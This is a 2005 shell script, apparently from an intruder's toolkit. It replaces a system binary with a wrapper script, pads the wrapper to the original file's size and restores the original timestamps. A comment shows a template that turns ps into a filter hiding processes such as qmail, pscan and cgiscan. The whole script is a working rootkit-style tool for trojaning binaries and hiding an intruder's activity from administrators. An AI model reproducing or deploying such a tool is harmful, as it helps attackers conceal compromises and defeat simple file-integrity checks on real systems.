#!/bin/sh # Under GPL 2.0 and higher. # Written by hip0 on 31.03.2005 # Gets a victim file uses a previously putten script template # and fixes the size of the new generated file exactly to the size # of the original. Then just overwrites the original. # OR THE FAT LADY GETS IT!@#$ # Postnotes # Example template file #/usr/bin/ps "$@" |grep -v "sh qmail" | grep -v cgiscan|\ #grep -v SCREEN|grep -v pscan | grep -v "/bin/sh /bin/ps"|\ #grep -v "/usr/bin/ps"|grep -v "pptpd" # put as much grep -v as you need to grep from the output of ps # Note /usr/bin/ps is the location where the original ps binary is located full_with_string='#'; timestamp_temp_file=/tmp/timestamp; INTERACTIVE=0; string0="$0"; string1="$1"; string2="$2"; read_vals () { if [[ $INTERACTIVE = 1 ]]; then echo -n "Target file location: "; read t_file_name echo -n "File_template location: "; read file_template fi t_file_name="$string1"; file_template="$string2"; if [[ -z $string1 ]] || [[ ! -f $string1 ]]; then echo "$string1 file does not exist. ... Exiting."; syntax_desc; exit 1; fi if [[ -z $string2 ]] || [[ ! -f $string2 ]]; then echo "$string2 file does not exist. ... Exting."; exit 1; syntax_desc; fi if [[ -z ${t_file_name} ]] || [[ ! -f ${t_file_name} ]]; then echo "Enter a valid target file name and location."; exit 1; fi if [[ -z ${file_template} ]] || [[ ! -f ${file_template} ]]; then echo "Enter a valid new file template."; exit 1; fi echo "Backing file: ${t_file_name} timestamps to: ${timestamp_temp_file}"; touch ${timestamp_temp_file}; touch -acmr ${t_file_name} ${timestamp_temp_file}; } syntax_desc () { echo "Syntax is $(basename $string0) [ binary_filename_to_fix ] [ new_template_file ]"; echo "Greetings fly to the pcfreak crew!"; exit 1; } do_subst () { get_t_file_name_size=$(ls -lb ${t_file_name} | awk '{ print $5 }'); get_file_template_size=$(ls -lb ${file_template} | awk '{ print $5 }'); #echo $get_t_file_name_size; #echo $get_file_template_size; add_char_count=$((${get_t_file_name_size} - ${get_file_template_size})); #echo ${add_char_count}; echo "Creating fixed up ${file_template}.new"; cat ${file_template} > ${file_template}.new; perl -e "print \"${full_with_string}\"x${add_char_count}" \ >>${file_template}.new; echo "Creating ${t_file_name} backup to ${t_file_name}.bak"; cp -f ${t_file_name} ${t_file_name}.bak; echo "Check that and remove it all runs fine"; echo "Moving ${file_template}.new to ${file_template}"; mv ${file_template}.new ${t_file_name}; chmod +x ${t_file_name}; echo "Setting the original timestamp to the new ${t_file_name}"; touch -acmr ${timestamp_temp_file} ${t_file_name}; echo "Removing ${timestamp_temp_file} file."; echo "Be sure to remove the temp file manually."; echo -e "All done have fun.\n\n And thanks for using this Anti M$ Product!\n"; } main () { read_vals; do_subst; } main;